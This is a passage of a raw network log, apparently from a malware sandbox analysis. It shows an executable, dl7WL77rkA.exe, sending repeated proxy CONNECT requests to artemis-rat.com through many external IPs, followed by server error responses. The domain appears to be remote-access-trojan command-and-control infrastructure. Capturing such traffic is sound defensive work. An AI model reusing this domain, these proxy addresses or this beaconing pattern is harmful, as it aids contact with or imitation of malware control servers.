                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.423821926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.468288898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.509557009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1430192.168.2.553821103.216.49.15180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.352854967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1431192.168.2.553678184.170.249.6541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.352930069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1432192.168.2.552987162.253.68.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.360085011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1433192.168.2.553838200.10.73.21056783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.368350029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1434192.168.2.55388731.43.179.160803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.373224974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.529608011 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1435192.168.2.549802147.124.212.31110703876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.374489069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.423784971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.468287945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.509571075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1436192.168.2.553892172.67.162.127803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.376179934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.532151937 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1437192.168.2.553831185.217.143.23803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.383852959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.721004009 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1438192.168.2.553911104.25.87.42803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.388421059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.544698000 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1439192.168.2.55250383.136.219.140803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.389086008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.423821926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.804291964 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:50 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.804368973 CET269INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                                                                                                                                                                                                                                                            Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1440192.168.2.55354672.49.49.11310343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.392520905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1441192.168.2.55385337.44.238.2534713876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.398004055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092643023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.999547958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905389071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.592633963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.202121973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.905085087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1442192.168.2.552396202.40.181.220312473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.401707888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1443192.168.2.55243751.79.87.144225003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.402970076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.423821926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.468288898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.509557009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1444192.168.2.552501162.241.46.40562413876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.403696060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.405220032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.405416965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.499010086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1445192.168.2.553899162.144.36.208316833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.408813000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.905088902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.499144077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
